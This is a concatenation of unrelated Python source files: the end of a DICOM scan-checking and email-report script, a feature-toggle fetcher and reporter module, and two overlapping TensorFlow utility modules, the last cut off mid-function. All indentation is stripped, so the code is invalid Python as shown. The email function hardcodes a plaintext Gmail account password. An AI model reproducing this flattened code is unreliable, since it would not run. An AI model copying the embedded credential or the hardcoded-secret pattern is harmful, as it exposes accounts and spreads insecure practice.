# END intendedfor
def dcm_errorcheck(directories,img,modality,nruns):
# three primary error checks: missing, incomplete, duplicate runs
duplimg = []
missimg = []
incompimg = []
if not hasattr(dcm_errorcheck,"misstext"):
dcm_errorcheck.misstext="Missing scans:"
if not hasattr(dcm_errorcheck,"dupltext"):
dcm_errorcheck.dupltext="Duplicate scans:"
if not hasattr(dcm_errorcheck,"incomptext"):
dcm_errorcheck.incomptext="Incomplete scans:"
# check if directories matches number of runs
if len(directories) > nruns:
directories.sort(key=os.path.getctime)
directories = directories[-nruns:]
duplimg.append(modality + "-" + img['name'])
elif len(directories) < nruns and len(directories) > 0:
for rr in range(len(directories),nruns):
missimg.append(modality + "-" + img['name'] + "_run-" + str(rr+1).zfill(2))
elif len(directories) == 0:
missimg.append(modality + "-" + img['name'])
r=1;
for inputdir in directories:
# if length is defined...check this
if 'length' in img:
scan_length = img['length']
# check scan length
dcms = glob.glob(inputdir + "/*.dcm")
if len(dcms) < scan_length:
incompimg.append(modality + "-" + img['name'] + "_run-" + str(r).zfill(2))
r=r+1
nl="\n "
if missimg:
dcm_errorcheck.misstext = dcm_errorcheck.misstext + "\n " + nl.join(missimg)
if duplimg:
dcm_errorcheck.dupltext = dcm_errorcheck.dupltext + "\n " + nl.join(duplimg)
if incompimg:
dcm_errorcheck.incomptext = dcm_errorcheck.incomptext + "\n " + nl.join(incompimg)
# END dcm_errorcheck
def make_textreport(study,scannerid,pid,ses,scandate):
# store information for each subject ... run once per scan session
# generate report text
if study == "rray":
if ses != "none":
subjecttext="Subject: r" + str(pid) + "s" + str(ses)
else:
subjecttext="Subject: r" + str(pid)
else:
subjecttext="Subject: " + str(pid) + " Session: " + str(ses)
reporttxt = ("Study: " + study + "\n"
"Scannerid: " + scannerid + "\n" + subjecttext + "\n"
"Scan Date: " + scandate + "\n")
if not hasattr(nifti_convert,"warnings"):
nifti_convert.warnings = "Warnings:"
if len(nifti_convert.warnings.split("\n")) < 2:
nifti_convert.warnings = nifti_convert.warnings + " none"
if len(dcm_errorcheck.misstext.split("\n")) < 2:
dcm_errorcheck.misstext = dcm_errorcheck.misstext + " none"
if len(dcm_errorcheck.incomptext.split("\n")) < 2:
dcm_errorcheck.incomptext = dcm_errorcheck.incomptext + " none"
if len(dcm_errorcheck.dupltext.split("\n")) < 2:
dcm_errorcheck.dupltext = dcm_errorcheck.dupltext + " none"
reporttxt=(reporttxt + nifti_convert.warnings + "\n" + dcm_errorcheck.misstext + "\n" + dcm_errorcheck.incomptext + "\n" + dcm_errorcheck.dupltext)
delattr(nifti_convert,"warnings")
delattr(dcm_errorcheck,"misstext")
delattr(dcm_errorcheck,"incomptext")
delattr(dcm_errorcheck,"dupltext")
return reporttxt
# set up email notification
def sendemail(emailtxt,data,entry):
port = 465 # For SSL
smtp_server = "smtp.gmail.com"
sender_email = "noreply.incdata@gmail.com" # Enter your address
password = "Buffs2021!"
# get date info
import os.path, time
import datetime as dt
today = dt.datetime.now().date()
start_date = today - dt.timedelta(days=int(entry.trange))
# # ... email text ....
studyname = data['Acquisition'][0]['Study'][0]['name']
message = "Subject: " + "[inc_scanner_report] " + studyname + ": date range " + str(start_date) + " to " + str(today) + "\n\n" + emailtxt
for person in data['Study Contact']:
receiver_email = person['email']
context = ssl.create_default_context()
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, message)
def main(argv):
# get user entry
entry = parse_arguments(argv)
os.makedirs(entry.wd, exist_ok=True)
logdir = entry.wd + '/logs'
# get participant bids path:
heuristic(entry)
# check for new scans
new_scans(entry)
# END main
if __name__ == "__main__":
main(sys.argv[1:])
|
io.py | import datetime
import json
import logging
import threading
import time
import os
import requests
from .util import FrozenDict
log = logging.getLogger(__name__)
class PeriodicalOperation:
def __init__(self, interval, clock=time.time):
self.clock = clock
self.interval = interval
self.lock = threading.Lock()
self.last = self.clock()
self.cache = PeriodicalOperation
self.log = log.getChild(self.__class__.__name__)
def __call__(self):
if self.cache == PeriodicalOperation:
self.log.debug('first run')
self.lock.acquire(True)
self.run()
now = self.clock()
if now >= self.last + self.interval:
if self.lock.acquire(False):
self.log.info('got lock')
threading.Thread(target=self.run).start()
return self.cache
class UrlFetcher(PeriodicalOperation):
def __init__(self, url, interval, headers=None, clock=time.time):
super().__init__(interval, clock)
self.url = url
self._headers = headers or {}
self.etag = ''
def run(self):
# noinspection PyBroadException
try:
self._headers.update({'If-None-Match': self.etag})
self.log.debug("Headers: %r", self._headers)
self.log.debug("ETag: %r", self.etag)
res = requests.get(url=self.url, headers=self._headers, timeout=3.0)
self._headers.pop('If-None-Match', None)
if res.status_code == 304:
self.log.debug("use cached value")
return self.cache
elif res.ok:
self.log.debug("unpack new value")
self.etag = res.headers['ETag']
self.cache = res.json(object_hook=FrozenDict)
return self.cache
else:
res.raise_for_status()
except:
if log.isEnabledFor(logging.DEBUG):
log.debug("Exception fetching %r", self.url, exc_info=True)
else:
log.info("Exception fetching %r", self.url)
if self.cache is PeriodicalOperation:
self.cache = {}
return self.cache
finally:
self.last = self.clock()
self.lock.release()
class Reporter(PeriodicalOperation):
def __init__(self, client, url, interval, headers=None, clock=time.time):
super().__init__(interval, clock)
self.cache = None
self.client = client
self.url = url
self._headers = headers or {}
@staticmethod
def fmt_time(t):
return datetime.datetime.fromtimestamp(t).strftime('%FT%TZ')
def run(self):
# noinspection PyBroadException
try:
now = self.clock()
start, stop, self.last = self.last, now, now
bucket = {
'start': self.fmt_time(start),
'stop': self.fmt_time(stop),
'toggles': {
name: feature.report()
for name, feature in self.client.features.items()
},
}
report = {
"appName": self.client.app_name,
"instanceId": self.client.instance_id,
"bucket": bucket,
}
self.log.info('%r', report)
res = requests.post(self.url, headers=self._headers, json=report)
self.log.info('%r', res.status_code)
except:
pass
finally:
self.lock.release()
class FileFetcher:
open_f = open
stat_f = os.stat
def __init__(self, path):
self.cache = {}
self.path = path
self.last = 0
def __call__(self):
# noinspection PyBroadException
try:
st = self.stat_f(self.path)
if st.st_mtime > self.last:
with self.open_f(self.path) as fh:
self.cache = json.load(fh)
self.last = st.st_mtime
except:
if log.isEnabledFor(logging.DEBUG):
log.debug("Failed to read %r", self.path, exc_info=True)
else:
log.info("Failed to read %r")
finally:
return self.cache
|
tf_util.py | import copy
import os
import functools
import collections
import multiprocessing
import numpy as np
import tensorflow as tf
from tensorflow.python.client import device_lib
from stable_baselines import logger
def is_image(tensor):
"""
Check if a tensor has the shape of
a valid image for tensorboard logging.
Valid image: RGB, RGBD, GrayScale
:param tensor: (np.ndarray or tf.placeholder)
:return: (bool)
"""
return len(tensor.shape) == 3 and tensor.shape[-1] in [1, 3, 4]
def switch(condition, then_expression, else_expression):
"""
Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
:param condition: (TensorFlow Tensor) scalar tensor.
:param then_expression: (TensorFlow Operation)
:param else_expression: (TensorFlow Operation)
:return: (TensorFlow Operation) the switch output
"""
x_shape = copy.copy(then_expression.get_shape())
out_tensor = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
out_tensor.set_shape(x_shape)
return out_tensor
# ================================================================
# Extras
# ================================================================
def leaky_relu(tensor, leak=0.2):
"""
Leaky ReLU
http://web.stanford.edu/~awni/papers/relu_hybrid_icml2013_final.pdf
:param tensor: (float) the input value
:param leak: (float) the leaking coeficient when the function is saturated
:return: (float) Leaky ReLU output
"""
f_1 = 0.5 * (1 + leak)
f_2 = 0.5 * (1 - leak)
return f_1 * tensor + f_2 * abs(tensor)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(tensor, delta=1.0):
"""
Reference: https://en.wikipedia.org/wiki/Huber_loss
:param tensor: (TensorFlow Tensor) the input value
:param delta: (float) huber loss delta value
:return: (TensorFlow Tensor) huber loss output
"""
return tf.where(
tf.abs(tensor) < delta,
tf.square(tensor) * 0.5,
delta * (tf.abs(tensor) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def make_session(num_cpu=None, make_default=False, graph=None):
"""
Returns a session that will use <num_cpu> CPU's only
:param num_cpu: (int) number of CPUs to use for TensorFlow
:param make_default: (bool) if this should return an InteractiveSession or a normal Session
:param graph: (TensorFlow Graph) the graph of the session
:return: (TensorFlow session)
"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
tf_config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
# Prevent tensorflow from taking all the gpu memory
tf_config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=tf_config, graph=graph)
else:
return tf.Session(config=tf_config, graph=graph)
def single_threaded_session(make_default=False, graph=None):
"""
Returns a session which will only use a single CPU
:param make_default: (bool) if this should return an InteractiveSession or a normal Session
:param graph: (TensorFlow Graph) the graph of the session
:return: (TensorFlow session)
"""
return make_session(num_cpu=1, make_default=make_default, graph=graph)
def in_session(func):
"""
wrappes a function so that it is in a TensorFlow Session
:param func: (function) the function to wrap
:return: (function)
"""
@functools.wraps(func)
def newfunc(*args, **kwargs):
with tf.Session():
func(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize(sess=None):
"""
Initialize all the uninitialized variables in the global scope.
:param sess: (TensorFlow Session)
"""
if sess is None:
sess = tf.get_default_session()
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
sess.run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
"""
Return a parameter initializer for TensorFlow
:param std: (float) standard deviation
:param axis: (int) the axis to normalize on
:return: (function)
"""
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(input_tensor, num_filters, name, filter_size=(3, 3), stride=(1, 1),
pad="SAME", dtype=tf.float32, collections=None, summary_tag=None):
"""
Creates a 2d convolutional layer for TensorFlow
:param input_tensor: (TensorFlow Tensor) The input tensor for the convolution
:param num_filters: (int) The number of filters
:param name: (str) The TensorFlow variable scope
:param filter_size: (tuple) The filter size
:param stride: (tuple) The stride of the convolution
:param pad: (str) The padding type ('VALID' or 'SAME')
:param dtype: (type) The data type for the Tensors
:param collections: (list) List of graph collections keys to add the Variable to
:param summary_tag: (str) image summary name, can be None for no image summary
:return: (TensorFlow Tensor) 2d convolutional layer
"""
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(input_tensor.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
weight = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
bias = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(weight, [filter_size[0], filter_size[1], -1, 1]), [2, 0, 1, 3]),
max_outputs=10)
return tf.nn.conv2d(input_tensor, weight, stride_shape, pad) + bias
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""
Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs. Just like a Theano function.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
>>> x = tf.placeholder(tf.int32, (), name="x")
>>> y = tf.placeholder(tf.int32, (), name="y")
>>> z = 3 * x + 2 * y
>>> lin = function([x, y], z, givens={y: 0})
>>> with single_threaded_session():
>>> initialize()
>>> assert lin(2) == 6
>>> assert lin(x=3) == 9
>>> assert lin(2, 2) == 10
:param inputs: (TensorFlow Tensor or Object with make_feed_dict) list of input arguments
:param outputs: (TensorFlow Tensor) list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
:param updates: ([tf.Operation] or tf.Operation)
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
:param givens: (dict) the values known for the output
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
func = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), func(*args, **kwargs)))
else:
func = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: func(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
"""
Theano like function
:param inputs: (TensorFlow Tensor or Object with make_feed_dict) list of input arguments
:param outputs: (TensorFlow Tensor) list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
:param updates: ([tf.Operation] or tf.Operation)
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
:param givens: (dict) the values known for the output
"""
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (isinstance(inpt, tf.Tensor)and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
@classmethod
def _feed_input(cls, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = value
def __call__(self, *args, sess=None, **kwargs):
assert len(args) <= len(self.inputs), "Too many arguments provided"
if sess is None:
sess = tf.get_default_session()
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])
results = sess.run(self.outputs_update, feed_dict=feed_dict, **kwargs)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(tensor):
"""
get TensorFlow Tensor shape
:param tensor: (TensorFlow Tensor) the input tensor
:return: ([int]) the shape
"""
out = tensor.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(tensor):
"""
get TensorFlow Tensor's number of elements
:param tensor: (TensorFlow Tensor) the input tensor
:return: (int) the number of elements
"""
return intprod(var_shape(tensor))
def intprod(tensor):
"""
calculates the product of all the elements in a list
:param tensor: ([Number]) the list of elements
:return: (int) the product truncated
"""
return int(np.prod(tensor))
def flatgrad(loss, var_list, clip_norm=None):
"""
calculates the gradient and flattens it
:param loss: (float) the loss value
:param var_list: ([TensorFlow Tensor]) the variables
:param clip_norm: (float) clip the gradients (disabled if None)
:return: ([TensorFlow Tensor]) flattend gradient
"""
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self,
var_list,
dtype=tf.float32,
sess=None):
"""
Set the parameters from a flat vector
:param var_list: ([TensorFlow Tensor]) the variables
:param dtype: (type) the type for the placeholder
:param sess: (TensorFlow Session)
"""
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, _var) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(_var, tf.reshape(theta[start:start + size], shape)))
start += size
self.operation = tf.group(*assigns)
self.sess = sess
def __call__(self, theta):
if self.sess is None:
return tf.get_default_session().run(self.operation, feed_dict={self.theta: theta})
else:
return self.sess.run(self.operation, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list, sess=None):
"""
Get the parameters as a flat vector
:param var_list: ([TensorFlow Tensor]) the variables
:param sess: (TensorFlow Session)
"""
self.operation = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
self.sess = sess
def __call__(self):
if self.sess is None:
return tf.get_default_session().run(self.operation)
else:
return self.sess.run(self.operation)
def flattenallbut0(tensor):
"""
flatten all the dimension, except from the first one
:param tensor: (TensorFlow Tensor) the input tensor
:return: (TensorFlow Tensor) the flattened tensor
"""
return tf.reshape(tensor, [-1, intprod(tensor.get_shape().as_list()[1:])])
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(_vars):
"""
log variable information, for debug purposes
:param _vars: ([TensorFlow Tensor]) the variables
"""
count_params = 0
for _var in _vars:
name = _var.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name:
continue
v_params = np.prod(_var.shape.as_list())
count_params += v_params
if "/b:" in name or "/biases" in name:
continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " " * (55 - len(name)), v_params, str(_var.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params * 1e-6))
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None, var_list=None):
"""
Load a TensorFlow saved model
:param fname: (str) the graph name
:param sess: (TensorFlow Session) the session, if None: get_default_session()
:param var_list: ([TensorFlow Tensor] or dict(str: TensorFlow Tensor)) A list of Variable/SaveableObject,
or a dictionary mapping names to SaveableObject`s. If ``None``, defaults to the list of all saveable objects.
"""
if sess is None:
sess = tf.get_default_session()
# avoir crashing when loading the direct name without explicitly adding the root folder
if os.path.dirname(fname) == '':
fname = os.path.join('./', fname)
saver = tf.train.Saver(var_list=var_list)
saver.restore(sess, fname)
def save_state(fname, sess=None, var_list=None):
"""
Save a TensorFlow model
:param fname: (str) the graph name
:param sess: (TensorFlow Session) The tf session, if None, get_default_session()
:param var_list: ([TensorFlow Tensor] or dict(str: TensorFlow Tensor)) A list of Variable/SaveableObject,
or a dictionary mapping names to SaveableObject`s. If ``None``, defaults to the list of all saveable objects.
"""
if sess is None:
sess = tf.get_default_session()
dir_name = os.path.dirname(fname)
# avoir crashing when saving the direct name without explicitly adding the root folder
if dir_name == '':
dir_name = './'
fname = os.path.join(dir_name, fname)
os.makedirs(dir_name, exist_ok=True)
saver = tf.train.Saver(var_list=var_list)
saver.save(sess, fname)
# ================================================================
# retrieving variables
# ================================================================
def get_trainable_vars(name):
"""
returns the trainable variables
:param name: (str) the scope
:return: ([TensorFlow Variable])
"""
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
def get_globals_vars(name):
"""
returns the trainable variables
:param name: (str) the scope
:return: ([TensorFlow Variable])
"""
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
def outer_scope_getter(scope, new_scope=""):
"""
remove a scope layer for the getter
:param scope: (str) the layer to remove
:param new_scope: (str) optional replacement name
:return: (function (function, str, ``*args``, ``**kwargs``): Tensorflow Tensor)
"""
def _getter(getter, name, *args, **kwargs):
name = name.replace(scope + "/", new_scope, 1)
val = getter(name, *args, **kwargs)
return val
return _getter
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
updates: [tf.Operation] or tf.Operation
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
self.input_names = {inp.name.split("/")[-1].split(":")[0]: inp for inp in inputs}
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args, **kwargs):
assert len(args) + len(kwargs) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
for inpt_name, value in kwargs.items():
self._feed_input(feed_dict, self.input_names[inpt_name], value)
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus(session_config=None):
# based on recipe from https://stackoverflow.com/a/38580201
# Unless we allocate a session here, subsequent attempts to create one
# will ignore our custom config (in particular, allow_growth=True will have
# no effect).
if session_config is None:
session_config = get_session()._config
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices(session_config)
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
import joblib
sess = sess or get_session()
variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
import joblib
sess = sess or get_session()
variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
